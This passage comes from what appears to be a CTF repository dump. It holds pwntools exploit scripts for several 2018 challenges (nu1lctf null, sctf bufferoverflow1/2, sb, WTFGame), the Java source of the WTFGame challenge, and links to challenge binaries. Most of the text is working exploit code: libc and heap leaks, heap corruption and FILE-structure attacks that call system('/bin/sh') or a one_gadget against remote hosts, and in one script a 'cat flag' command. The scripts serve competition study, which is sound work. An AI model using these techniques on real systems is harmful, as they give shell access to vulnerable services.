| set_addr(bss-6,save-6) 89 | sw() 90 | make_byte(p16(0x8e8)) 91 | set_addr(bss+0x100-6,save-6) 92 | sw() 93 | set_addr(bss+0x100,stack_check_failed) 94 | sw() 95 | puts_plt=0x4006A0 96 | poprdiret=0x0400a53 97 | puts_got=0x601028 98 | poprbpret=0x0000000000400760 99 | leaveret=0x4008E7 100 | payload='A'*22+p64(poprbpret)+p64(save-8)+p64(leaveret) 101 | payload2=p64(poprdiret)+p64(puts_got)+p64(puts_plt)+p64(0x40088E) 102 | make_byte(payload2) 103 | set_addr(bss,atoi) 104 | sw() 105 | sla("choice:",payload) 106 | ru(": \n") 107 | puts_addr=raddr(6) 108 | lg("puts addr",puts_addr) 109 | libc.address=puts_addr-libc.symbols['puts'] 110 | one_shot=libc.address+0x4557a 111 | sl(cyclic(20)+p64(one_shot)) 112 | 113 | p.interactive() 114 | -------------------------------------------------------------------------------- /2018/TokyoWestern/swap_return/swap_returns: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/TokyoWestern/swap_return/swap_returns -------------------------------------------------------------------------------- /2018/hctf/heapstorm_zero/heapstorm_zero: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/hctf/heapstorm_zero/heapstorm_zero -------------------------------------------------------------------------------- /2018/hctf/heapstorm_zero/libc64.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/hctf/heapstorm_zero/libc64.so -------------------------------------------------------------------------------- /2018/nu1lctf/null/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | local=1 4 | pc='./null' 5 | remote_addr="47.75.57.242" 6 | remote_port=5000 7 | 8 | if local: 9 | p=process(pc) 10 | else: 11 | p=remote(remote_addr,remote_port) 12 | 13 | def ru(a): 14 | return p.recvuntil(a) 15 | 16 | def sn(a): 17 | p.send(a) 18 | 19 | def rl(): 20 | return p.recvline() 21 | 22 | def sl(a): 23 | p.sendline(a) 24 | 25 | def sa(a,b): 26 | p.sendafter(a,b) 27 | 28 | def sla(a,b): 29 | p.sendlineafter(a,b) 30 | 31 | def choice(index): 32 | sla('Action: ',str(index)) 33 | 34 | def alloc(size,padnum,isw): 35 | choice(1) 36 | sla(': ',str(size)) 37 | sla(': ',str(padnum)) 38 | sla(": ",str(isw)) 39 | if(isw): 40 | ru(': ') 41 | 42 | def inp(content): 43 | sn(content) 44 | sleep(0.5) 45 | 46 | def hack(): 47 | passwd="i'm ready for challenge\n" 48 | sa(": \n",passwd) 49 | ru('exit\n') 50 | 51 | for i in range(16): 52 | alloc(0x3000,1000,0) 53 | alloc(0x3000,345,0) 54 | 55 | alloc(0xa00,0,0) 56 | alloc(0xa00,0,0) 57 | alloc(0xd0+0x170,0,0) 58 | alloc(0xc0,0,0) 59 | alloc(0xc0,0,1) 60 | 61 | payload='A'+p64(0)*6+p64(0x4000000)*2+p64(0x300000000)+p64(0x60201d)*10 62 | inp((0xc0-1)*'A') 63 | inp(payload) 64 | alloc(0x68,0,1) 65 | payload='/bin/sh\x00'+'A'*3+p64(0x00400978) 66 | payload=payload.ljust(0x68,'\x00') 67 | inp(payload) 68 | p.interactive() 69 | 70 | hack() 71 | -------------------------------------------------------------------------------- /2018/sctf/WTFGame/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | remote_addr="149.28.12.44" 4 | remote_port=10001 5 | 6 | p=remote(remote_addr,remote_port) 7 | #context.log_level=True 8 | ru = lambda x : p.recvuntil(x) 9 | sn = lambda x : p.send(x) 10 | rl = lambda : p.recvline() 11 | sl = lambda x : p.sendline(x) 12 | rv = lambda x : p.recv(x) 13 | sa = lambda a,b : p.sendafter(a,b) 14 | sla = lambda a,b : p.sendlineafter(a,b) 15 | def lg(s,addr): 16 | print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) 17 | 18 | def raddr(a,l=None): 19 | if l==None: 20 | return u64(rv(a).ljust(8,'\x00')) 21 | else: 22 | return u64(rl().strip('\n').ljust(8,'\x00')) 23 | 24 | my=0 25 | boss=0 26 | def cmd(command): 27 | sla('>',command) 28 | 29 | def save(): 30 | global my 31 | global boss 32 | cmd('save') 33 | my=int(rv(len('-1088065416'))) 34 | rv(1) 35 | boss=int(rl().strip('\n')) 36 | # print(my) 37 | # print(boss) 38 | 39 | def setaddress(addr): 40 | cmd('DebugSetDataStoreAddress#'+str(addr)) 41 | 42 | def show(): 43 | cmd('ShowInfo') 44 | 45 | def hack(): 46 | cmd('VeroFessIsHandsome') 47 | save() 48 | setaddress(boss) 49 | show() 50 | k=rl().strip('\n')[2:] 51 | setaddress(my) 52 | show() 53 | cmd("SetATK#"+k) 54 | show() 55 | flag=rl().split('|')[-1] 56 | print flag 57 | p.interactive() 58 | 59 | hack() 60 | -------------------------------------------------------------------------------- /2018/sctf/WTFGame/src/com/sctf/verofess/Main.java: -------------------------------------------------------------------------------- 1 | package com.sctf.verofess; 2 | 3 | import com.sctf.verofess.game.WTFGame; 4 | 5 | import java.io.BufferedReader; 6 | import java.io.IOException; 7 | import java.io.InputStreamReader; 8 | 9 | public class Main { 10 | public static void main(String[] args) { 11 | WTFGame GameInstance = new WTFGame(); 12 | BufferedReader _BufferedReader = new BufferedReader(new InputStreamReader(System.in)); 13 | 14 | System.out.println("Do you like van you xi? Type your command!"); 15 | System.out.println("P.S.: Buy VIP J!U!S!T! need 99999.99$!"); 16 | 17 | String Command = ""; 18 | 19 | while(!Command.equalsIgnoreCase("Exit")){ 20 | System.out.print(">"); 21 | try { 22 | Command = _BufferedReader.readLine(); 23 | } catch (IOException e) { 24 | e.printStackTrace(); 25 | } 26 | System.out.println(GameInstance.PraseCommand(Command)); 27 | } 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /2018/sctf/WTFGame/src/com/sctf/verofess/blackmagic/FastArray.java: -------------------------------------------------------------------------------- 1 | package com.sctf.verofess.blackmagic; 2 | 3 | public class FastArray { 4 | private UnsafeWapper unsafeWapper = new UnsafeWapper(); 5 | private long ArrayPointer = 0; 6 | 7 | public FastArray(int ArraySize) { 8 | ArrayPointer = unsafeWapper.AllocMemory(4 * ArraySize); 9 | } 10 | 11 | public FastArray(long OldArrayPointer) { 12 | this.ArrayPointer = OldArrayPointer; 13 | } 14 | 15 | public int GetIntData(int Index) { 16 | return unsafeWapper.ReadIntData(ArrayPointer + 4 * Index); 17 | } 18 | 19 | public void PutIntData(int Index, int Data) { 20 | unsafeWapper.PutIntData(ArrayPointer + 4 * Index, Data); 21 | } 22 | 23 | public long GetPointer() { 24 | return ArrayPointer; 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /2018/sctf/WTFGame/src/com/sctf/verofess/blackmagic/UnsafeWapper.java: -------------------------------------------------------------------------------- 1 | package com.sctf.verofess.blackmagic; 2 | 3 | import sun.misc.Unsafe; 4 | 5 | import java.lang.reflect.Field; 6 | 7 | public class UnsafeWapper { 8 | private static Unsafe UnsafeInstance = UnsafeWapper.GetUnsafeInstance(); 9 | 10 | private static Unsafe GetUnsafeInstance() { 11 | try { 12 | Field TheUnsafeField = Unsafe.class.getDeclaredField("theUnsafe"); 13 | TheUnsafeField.setAccessible(true); 14 | return (Unsafe) TheUnsafeField.get(null); 15 | } catch (Exception e) { 16 | throw new RuntimeException(e.getMessage()); 17 | } 18 | } 19 | 20 | public static Unsafe getUnsafeInstance() { 21 | return UnsafeInstance; 22 | } 23 | 24 | public long AllocMemory(long ArrayByteSize) { 25 | return UnsafeInstance.allocateMemory(ArrayByteSize); 26 | } 27 | 28 | public int ReadIntData(long BasicAddress) { 29 | return UnsafeInstance.getInt(BasicAddress); 30 | } 31 | 32 | public void PutIntData(long BasicAddress, int Data) { 33 | UnsafeInstance.putInt(BasicAddress, Data); 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /2018/sctf/WTFGame/src/com/sctf/verofess/game/Boss.java: -------------------------------------------------------------------------------- 1 | package com.sctf.verofess.game; 2 | 3 | import com.sctf.verofess.blackmagic.FastArray; 4 | import com.sctf.verofess.game.interfaces.IEntity; 5 | 6 | public class Boss implements IEntity { 7 | private FastArray DataStore = new FastArray(3); 8 | 9 | public Boss(){ 10 | DataStore.PutIntData(0, Integer.MAX_VALUE); 11 | DataStore.PutIntData(1, Integer.MAX_VALUE); 12 | } 13 | 14 | public void setDataStore(FastArray dataStore) { 15 | DataStore = dataStore; 16 | } 17 | 18 | @Override 19 | public int GetHP() { 20 | return DataStore.GetIntData(0); 21 | } 22 | 23 | @Override 24 | public int GetAttack() { 25 | return DataStore.GetIntData(0); 26 | } 27 | 28 | @Override 29 | public long GetDataStoreAddress() { 30 | return DataStore.GetPointer(); 31 | } 32 | 33 | @Override 34 | public boolean CheckCommand(String Command) { // Boss Can Do ANYTHING 35 | return true; 36 | } 37 | 38 | @Override 39 | public String toString(){ //Boss Know Every Thing 40 | return (Integer.toHexString(this.GetHP()) + "|" + Integer.toHexString(this.GetAttack()) + "|"+ (new FLAG()).toString()); 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /2018/sctf/WTFGame/src/com/sctf/verofess/game/FLAG.java: -------------------------------------------------------------------------------- 1 | package com.sctf.verofess.game; 2 | 3 | public class FLAG { 4 | @Override 5 | public String toString(){ 6 | return "TEST_FLAG"; 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /2018/sctf/WTFGame/src/com/sctf/verofess/game/NormalPlayer.java: -------------------------------------------------------------------------------- 1 | package com.sctf.verofess.game; 2 | 3 | import com.sctf.verofess.blackmagic.FastArray; 4 | import com.sctf.verofess.game.interfaces.IEntity; 5 | 6 | public class NormalPlayer implements IEntity { 7 | private FastArray DataStore = new FastArray(3); 8 | 9 | public NormalPlayer(){ 10 | DataStore.PutIntData(0, Integer.MIN_VALUE); 11 | DataStore.PutIntData(1, Integer.MIN_VALUE); 12 | } 13 | 14 | public void setDataStore(FastArray dataStore) { 15 | DataStore = dataStore; 16 | } 17 | 18 | @Override 19 | public int GetHP() { 20 | return DataStore.GetIntData(0); 21 | } 22 | 23 | @Override 24 | public int GetAttack() { 25 | return DataStore.GetIntData(1); 26 | } 27 | 28 | @Override 29 | public long GetDataStoreAddress() { 30 | return DataStore.GetPointer(); 31 | } 32 | 33 | @Override 34 | public boolean CheckCommand(String Command) { 35 | return false; 36 | } 37 | 38 | @Override 39 | public String toString(){ 40 | return this.GetHP() + "-" + this.GetAttack(); 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /2018/sctf/WTFGame/src/com/sctf/verofess/game/Save.java: -------------------------------------------------------------------------------- 1 | package com.sctf.verofess.game; 2 | 3 | import com.sctf.verofess.blackmagic.FastArray; 4 | import com.sctf.verofess.blackmagic.UnsafeWapper; 5 | 6 | public class Save { // Useless Class 7 | private static Object helperArray[] = new Object[1]; 8 | private static FastArray SaveArray = new FastArray(6); 9 | 10 | public Save (String SavedData){ 11 | 12 | } 13 | 14 | public Save(Object Player, Object Boss) { 15 | helperArray[0] = Player; 16 | SaveArray.PutIntData(0, UnsafeWapper.getUnsafeInstance().getInt(helperArray, UnsafeWapper.getUnsafeInstance().arrayBaseOffset(Object[].class))); 17 | helperArray[0] = Boss; 18 | SaveArray.PutIntData(1, UnsafeWapper.getUnsafeInstance().getInt(helperArray, UnsafeWapper.getUnsafeInstance().arrayBaseOffset(Object[].class))); 19 | } 20 | 21 | @Override 22 | public String toString(){ 23 | return SaveArray.GetIntData(0) + "-" + SaveArray.GetIntData(1); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /2018/sctf/WTFGame/src/com/sctf/verofess/game/VIPPlayer.java: -------------------------------------------------------------------------------- 1 | package com.sctf.verofess.game; 2 | 3 | import com.sctf.verofess.blackmagic.FastArray; 4 | import com.sctf.verofess.game.interfaces.IEntity; 5 | 6 | public class VIPPlayer implements IEntity { 7 | private FastArray DataStore = new FastArray(3); 8 | 9 | public VIPPlayer(){ 10 | DataStore.PutIntData(0, Integer.MIN_VALUE); 11 | DataStore.PutIntData(1, Integer.MIN_VALUE); 12 | } 13 | 14 | public void SetHP(int HP){ 15 | DataStore.PutIntData(0, HP); 16 | } 17 | 18 | 19 | public void SetATK(int ATK){ 20 | DataStore.PutIntData(1, ATK); 21 | } 22 | 23 | public void setDataStore(FastArray dataStore) { 24 | DataStore = dataStore; 25 | } 26 | 27 | @Override 28 | public int GetHP() { 29 | return DataStore.GetIntData(0); 30 | } 31 | 32 | @Override 33 | public int GetAttack() { 34 | return DataStore.GetIntData(1); 35 | } 36 | 37 | @Override 38 | public long GetDataStoreAddress() { 39 | return DataStore.GetPointer(); 40 | } 41 | 42 | @Override 43 | public boolean CheckCommand(String Command) { 44 | return true;//Oh! VIP! YOU CAM DO ANY THING! 45 | } 46 | 47 | @Override 48 | public String toString(){ 49 | return (this.GetHP() + "-" + this.GetAttack()); 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /2018/sctf/WTFGame/src/com/sctf/verofess/game/WTFGame.java: -------------------------------------------------------------------------------- 1 | package com.sctf.verofess.game; 2 | 3 | import com.sctf.verofess.blackmagic.FastArray; 4 | import com.sctf.verofess.game.interfaces.IEntity; 5 | 6 | public class WTFGame { 7 | private static Boss boss = new Boss(); 8 | 9 | private IEntity Player = null; 10 | 11 | public String PraseCommand(String Command){ 12 | if(Command.equalsIgnoreCase("CreatePlayer")){ 13 | this.Player = new NormalPlayer(); 14 | return "OK!"; 15 | } 16 | 17 | if(Command.equalsIgnoreCase("VeroFessIsHandsome")){ 18 | this.Player = new VIPPlayer(); 19 | return "OK!"; 20 | } 21 | 22 | if(Command.equalsIgnoreCase("ShowInfo")){ 23 | if(this.Player != null && this.Player.CheckCommand(Command)){ 24 | return this.Player.toString(); 25 | } 26 | } 27 | 28 | if(Command.startsWith("SetHP")){ 29 | if(this.Player != null && this.Player.CheckCommand(Command)){ 30 | int Number = Integer.decode(Command.split("#")[1]); 31 | ((VIPPlayer)this.Player).SetHP(Number); 32 | return "OK!"; 33 | } 34 | } 35 | 36 | if(Command.startsWith("SetATK")){ 37 | if(this.Player != null && this.Player.CheckCommand(Command)){ 38 | int Number = Integer.decode(Command.split("#")[1]); 39 | ((VIPPlayer)this.Player).SetATK(Number); 40 | return "OK!"; 41 | } 42 | } 43 | 44 | if(Command.equalsIgnoreCase("SwapWithBoss")){ 45 | if(this.Player != null && this.Player.CheckCommand(Command)){ 46 | ((VIPPlayer)this.Player).setDataStore(new FastArray(WTFGame.boss.GetDataStoreAddress())); 47 | WTFGame.boss.setDataStore(new FastArray(((VIPPlayer) this.Player).GetDataStoreAddress())); 48 | return "OK!"; 49 | } 50 | } 51 | 52 | if(Command.equalsIgnoreCase("GetFlag")){ 53 | if(this.Player != null && this.Player.CheckCommand(Command)){ 54 | return "FLAG!"; 55 | } 56 | } 57 | 58 | if(Command.equalsIgnoreCase("Attack")){ 59 | if(((IEntity)this.Player).GetAttack() > Integer.MAX_VALUE && ((IEntity)this.Player).GetHP() > Integer.MAX_VALUE){ 60 | return (new FLAG()).toString(); 61 | } 62 | } 63 | 64 | if(Command.equalsIgnoreCase("Save")){ 65 | if(this.Player != null && this.Player.CheckCommand(Command)){ 66 | return (new Save(this.Player, WTFGame.boss)).toString(); 67 | } 68 | } 69 | 70 | if(Command.equalsIgnoreCase("DebugShowDataStoreAddress")){ 71 | if(this.Player != null && this.Player.CheckCommand(Command)){ 72 | return Long.toString((this.Player).GetDataStoreAddress()); 73 | } 74 | } 75 | 76 | if(Command.startsWith("DebugSetDataStoreAddress")){ 77 | if(this.Player != null && this.Player.CheckCommand(Command)){ 78 | long Address = Long.decode(Command.split("#")[1]); 79 | ((VIPPlayer)this.Player).setDataStore(new FastArray(Address)); 80 | return "OK!"; 81 | } 82 | } 83 | 84 | return "Error!"; 85 | } 86 | } 87 | -------------------------------------------------------------------------------- /2018/sctf/WTFGame/src/com/sctf/verofess/game/interfaces/IEntity.java: -------------------------------------------------------------------------------- 1 | package com.sctf.verofess.game.interfaces; 2 | 3 | public interface IEntity { 4 | int GetHP(); 5 | int GetAttack(); 6 | long GetDataStoreAddress(); 7 | boolean CheckCommand(String Command); 8 | } 9 | -------------------------------------------------------------------------------- /2018/sctf/bufferoverflow1/bufoverflow_a: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/sctf/bufferoverflow1/bufoverflow_a -------------------------------------------------------------------------------- /2018/sctf/bufferoverflow1/bufoverflow_a.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/sctf/bufferoverflow1/bufoverflow_a.i64 -------------------------------------------------------------------------------- /2018/sctf/bufferoverflow1/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | local=0 4 | uselibc=2 #0 for no,1 for i386,2 for x64 5 | haslibc=1 6 | pc='./bufoverflow_a' 7 | remote_addr="116.62.152.176" 8 | remote_port=20001 9 | 10 | libc=ELF('./libc.so.6') 11 | 12 | #context.log_level=True 13 | if local==1: 14 | p = process(pc,aslr=False,env={'LD_PRELOAD': './libc.so.6'}) 15 | gdb.attach(p,'c') 16 | else: 17 | p=remote(remote_addr,remote_port) 18 | if haslibc!=0: 19 | libc=ELF('./libc.so.6') 20 | 21 | ru = lambda x : p.recvuntil(x) 22 | sn = lambda x : p.send(x) 23 | rl = lambda : p.recvline() 24 | sl = lambda x : p.sendline(x) 25 | rv = lambda x : p.recv(x) 26 | sa = lambda a,b : p.sendafter(a,b) 27 | sla = lambda a,b : p.sendlineafter(a,b) 28 | def lg(s,addr): 29 | print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) 30 | 31 | def raddr(a,l=None): 32 | if l==None: 33 | return u64(rv(a).ljust(8,'\x00')) 34 | else: 35 | return u64(rl().strip('\n').ljust(8,'\x00')) 36 | 37 | def choice(index): 38 | sla('>> ',str(index)) 39 | 40 | def alloc(size): 41 | choice(1) 42 | sla(': ',str(size)) 43 | 44 | def free(index): 45 | choice(2) 46 | sla(': ',str(index)) 47 | 48 | def fill(content): 49 | choice(3) 50 | sa(': ',content) 51 | 52 | def show(): 53 | choice(4) 54 | sleep(1) 55 | 56 | def hack(): 57 | alloc(0x100) 58 | alloc(0x100) 59 | alloc(0x100) 60 | alloc(0x100) 61 | free(0) 62 | free(2) 63 | free(3) 64 | free(1) 65 | alloc(0x210) 66 | show() 67 | libcaddr=raddr(6)-0x399b58 68 | libc.address=libcaddr 69 | lg("libc",libcaddr) 70 | alloc(0x210) 71 | show() 72 | heapaddr=raddr(6)-0x20 73 | lg("heap",heapaddr) 74 | free(0) 75 | free(1) 76 | 77 | alloc(0xf8) 78 | alloc(0xf8) 79 | free(0) 80 | alloc(0xf8) 81 | payload='\x00'*0x80+p64(0)+p64(0x21)+p64(heapaddr+0xb0)*2+p64(0)+p64(0x21) 82 | fill(payload.ljust(0xf0,'\x00')+p64(0x70)) 83 | free(1) 84 | alloc(0x100) 85 | fill('\x00'*0x68+p64(0x21)+p64(0)*3+p64(0x21)+"\n") 86 | 87 | free(1) 88 | free(0) 89 | 90 | alloc(0x128) 91 | payload='\x00'*0x48+p64(libc.search('/bin/sh').next())+p64(heapaddr+0x108-0x30)+p64(0)*2+p64(0x101)+p64(0)*2+p64(libc.symbols['_IO_wfile_jumps']-0x248)*2+p64(libc.symbols['system'])*2 92 | payload=payload.ljust(0xe8,'\x00') 93 | payload+=p64(0x41)+'\n' 94 | fill(payload) 95 | alloc(0xf8) 96 | fill('\x00'*0x88+p64(0xf1)+'\n') 97 | free(1) 98 | free(0) 99 | 100 | alloc(0xf8) 101 | payload=p64(0)+p64(libc.symbols['_IO_list_all']-0x10)+p64(0)*7+p64(0x61)+p64(0)+p64(heapaddr+0x20)+p64(0)+p64(1) 102 | payload=payload.ljust(0x88,'\x00') 103 | payload=payload+p64(0xf1)+p64(0)+p64(heapaddr+0x70)+'\n' 104 | fill(payload) 105 | alloc(0xf8) 106 | alloc(300) 107 | p.interactive() 108 | 109 | hack() 110 | -------------------------------------------------------------------------------- /2018/sctf/bufferoverflow1/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/sctf/bufferoverflow1/libc.so.6 -------------------------------------------------------------------------------- /2018/sctf/bufferoverflow2/bufoverflow_b: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/sctf/bufferoverflow2/bufoverflow_b -------------------------------------------------------------------------------- /2018/sctf/bufferoverflow2/bufoverflow_b.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/sctf/bufferoverflow2/bufoverflow_b.i64 -------------------------------------------------------------------------------- /2018/sctf/bufferoverflow2/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | local=0 4 | uselibc=2 #0 for no,1 for i386,2 for x64 5 | haslibc=1 6 | pc='./bufoverflow_b' 7 | remote_addr="116.62.152.176" 8 | remote_port=20002 9 | 10 | libc=ELF('./libc.so.6') 11 | 12 | context.log_level=True 13 | if local==1: 14 | p = process(pc,aslr=False,env={'LD_PRELOAD': './libc.so.6'}) 15 | gdb.attach(p,'c') 16 | else: 17 | p=remote(remote_addr,remote_port) 18 | if haslibc!=0: 19 | libc=ELF('./libc.so.6') 20 | 21 | ru = lambda x : p.recvuntil(x) 22 | sn = lambda x : p.send(x) 23 | rl = lambda : p.recvline() 24 | sl = lambda x : p.sendline(x) 25 | rv = lambda x : p.recv(x) 26 | sa = lambda a,b : p.sendafter(a,b) 27 | sla = lambda a,b : p.sendlineafter(a,b) 28 | def lg(s,addr): 29 | print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) 30 | 31 | def raddr(a,l=None): 32 | if l==None: 33 | return u64(rv(a).ljust(8,'\x00')) 34 | else: 35 | return u64(rl().strip('\n').ljust(8,'\x00')) 36 | 37 | def choice(index): 38 | sla('>> ',str(index)) 39 | 40 | def alloc(size): 41 | choice(1) 42 | sla(': ',str(size)) 43 | 44 | def free(index): 45 | choice(2) 46 | sla(': ',str(index)) 47 | 48 | def fill(content): 49 | k=len(content) 50 | if(content[k-1]=='\n'): 51 | choice(3) 52 | sa(': ','A'*(k)+'\n') 53 | k=k-1 54 | while k>1: 55 | if content[k-1]=='\x00': 56 | choice(3) 57 | sa(': ','A'*(k-1)+'\n') 58 | k=k-1 59 | else: 60 | left=k 61 | while content[left-1]!='\x00' and left>1: 62 | left-=1 63 | choice(3) 64 | sa(': ','A'*(left)+content[left:k]+'\n') 65 | k=left 66 | 67 | def show(): 68 | choice(4) 69 | sleep(1) 70 | 71 | def hack(): 72 | alloc(0x100) 73 | alloc(0x100) 74 | alloc(0x100) 75 | alloc(0x100) 76 | free(0) 77 | free(2) 78 | free(3) 79 | free(1) 80 | alloc(0x210) 81 | show() 82 | libcaddr=raddr(6)-0x399b58 83 | libc.address=libcaddr 84 | lg("libc",libcaddr) 85 | alloc(0x210) 86 | show() 87 | heapaddr=raddr(6)-0x20 88 | lg("heap",heapaddr) 89 | free(0) 90 | free(1) 91 | 92 | alloc(0xf8) 93 | alloc(0xf8) 94 | free(0) 95 | alloc(0xf8) 96 | payload='\x00'*0x80+p64(0)+p64(0x21)+p64(heapaddr+0xb0)*2+p64(0)+p64(0x21) 97 | fill(payload.ljust(0xf0,'\x00')+p64(0x70)+'\n') 98 | free(1) 99 | alloc(0x100) 100 | fill('\x00'*0x68+p64(0x21)+p64(0)*3+p64(0x21)) 101 | 102 | free(1) 103 | free(0) 104 | 105 | alloc(0x128) 106 | payload='\x00'*0x48+p64(libc.search('/bin/sh').next())+p64(heapaddr+0x108-0x30)+p64(0)*2+p64(0x101)+p64(0)*2+p64(libc.symbols['_IO_wfile_jumps']-0x248)*2+p64(libc.symbols['system'])*2 107 | payload=payload.ljust(0xe8,'\x00') 108 | payload+=p64(0x41) 109 | fill(payload) 110 | alloc(0xf8) 111 | fill('\x00'*0x88+p64(0xf1)) 112 | free(1) 113 | free(0) 114 | 115 | alloc(0xf8) 116 | payload=p64(0)+p64(libc.symbols['_IO_list_all']-0x10)+p64(0)*7+p64(0x61)+p64(0)+p64(heapaddr+0x20)+p64(0)+p64(1) 117 | payload=payload.ljust(0x88,'\x00') 118 | payload=payload+p64(0xf1)+p64(0)+p64(heapaddr+0x70) 119 | fill(payload) 120 | alloc(0xf8) 121 | alloc(300) 122 | p.clean() 123 | p.sendline('cat flag') 124 | flag=p.recvline() 125 | print flag 126 | p.interactive() 127 | 128 | hack() 129 | -------------------------------------------------------------------------------- /2018/sctf/bufferoverflow2/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/sctf/bufferoverflow2/libc.so.6 -------------------------------------------------------------------------------- /2018/sctf/sb/sb.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | local=0 4 | uselibc=2 #0 for no,1 for i386,2 for x64 5 | haslibc=0 6 | pc='./ssbb' 7 | remote_addr="116.62.142.216" 8 | remote_port=20002 9 | 10 | if uselibc==2 and haslibc==0: 11 | libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so') 12 | else: 13 | if uselibc==1 and haslibc==0: 14 | libc=ELF('/lib/i386-linux-gnu/libc-2.23.so') 15 | else: 16 | if haslibc!=0: 17 | libc=ELF('./libc.so.6') 18 | 19 | if local==1: 20 | if haslibc: 21 | p = process(pc,aslr=False,env={'LD_PRELOAD': './libc.so.6'}) 22 | else: 23 | p=process(pc,aslr=False) 24 | # context.log_level=True 25 | gdb.attach(p,'c') 26 | else: 27 | p=remote(remote_addr,remote_port) 28 | if haslibc!=0: 29 | libc=ELF('./libc.so.6') 30 | 31 | ru = lambda x : p.recvuntil(x) 32 | sn = lambda x : p.send(x) 33 | rl = lambda : p.recvline() 34 | sl = lambda x : p.sendline(x) 35 | rv = lambda x : p.recv(x) 36 | sa = lambda a,b : p.sendafter(a,b) 37 | sla = lambda a,b : p.sendlineafter(a,b) 38 | def lg(s,addr): 39 | print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) 40 | 41 | def raddr(a,l=None): 42 | if l==None: 43 | return u64(rv(a).ljust(8,'\x00')) 44 | else: 45 | return u64(rl().strip('\n').ljust(8,'\x00')) 46 | 47 | def choice(index): 48 | sla('exit\n',str(index)) 49 | 50 | def alloc(size,content): 51 | choice(1) 52 | sla('size\n',str(size)) 53 | sla('note\n',content) 54 | 55 | def free(idx): 56 | choice(2) 57 | sla('id:\n',str(idx)) 58 | 59 | def login(addr): 60 | choice(3) 61 | sla('name\n','A'*8+p64(addr)[0:7]) 62 | sla('admin\n',str(1)) 63 | 64 | def hack(): 65 | alloc(0x100,'AA') 66 | alloc(0x100,'AA') 67 | alloc(0x100,'AA') 68 | alloc(0x100,'AA') 69 | free(0) 70 | alloc(0x100,'') 71 | ru('note is\n') 72 | #libc_addr=raddr(6)-0x3c4b78 73 | libc_addr=raddr(6)-0x3c3b78 74 | #libc_addr=raddr(6) 75 | #libc_addr=raddr(6)-0x399b58 76 | libc.address=libc_addr 77 | lg("Libc",libc_addr) 78 | free(0) 79 | free(2) 80 | alloc(0x100,'A'*8) 81 | ru('A'*8) 82 | heap_addr=raddr(0,1)-0x0220 83 | lg("heap",heap_addr) 84 | free(3) 85 | free(1) 86 | free(0) 87 | 88 | alloc(0x1000,'AAAA') 89 | alloc(0x100,'BBB') 90 | alloc(0x1400,'bbb') 91 | alloc(0x100,'BBB') 92 | alloc(0x1700,'bb') 93 | alloc(0x1700,'bb') 94 | alloc(0x1700,'bb') 95 | alloc(0x1700,'A'*4848+p64(0x6e68)*2+p64(0x21)*5) 96 | free(1) 97 | login(heap_addr+0x1015-8) 98 | alloc(0x1200,'AA') 99 | alloc(0x500,'AA') 100 | free(8) 101 | free(3) 102 | payload=p64(0)+p64(0x61)+p64(heap_addr+0x2320)*2+p64(0)+p64(1) 103 | payload=payload.ljust(160,'\x00') 104 | payload+=p64(heap_addr+0x2310-0x30)+'/bin/sh\x00' 105 | payload=payload.ljust(216,'\x00') 106 | payload+=p64(libc_addr+0x3c2260-0x248)+p64(heap_addr+0x2230+168)+p64(libc_addr+0x45390)*2 107 | payload+=p64(0x201)+p64(0)+p64(libc_addr+0x3c4520-0x10) 108 | payload=payload.ljust(0x300,'\x00') 109 | payload=payload+p64(0)+p64(0x111)+p64(0xdeadbeef)+p64(heap_addr+0x2230) 110 | alloc(0x500,payload) 111 | alloc(0x200-8,'AA\n') 112 | free(3) 113 | print p.clean() 114 | p.interactive() 115 | 116 | hack() 117 | -------------------------------------------------------------------------------- /2018/sctf/sb/ssbb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/sctf/sb/ssbb -------------------------------------------------------------------------------- /2018/sctf/sb/ssbb.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/sctf/sb/ssbb.i64 -------------------------------------------------------------------------------- /2018/teaserDrangon/fastStorage/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import os 3 | local=0 4 | pc='./faststorage' 5 | pc='/tmp/pwn/faststorage_debug' 6 | remote_addr=['faststorage.hackable.software',1337] 7 | 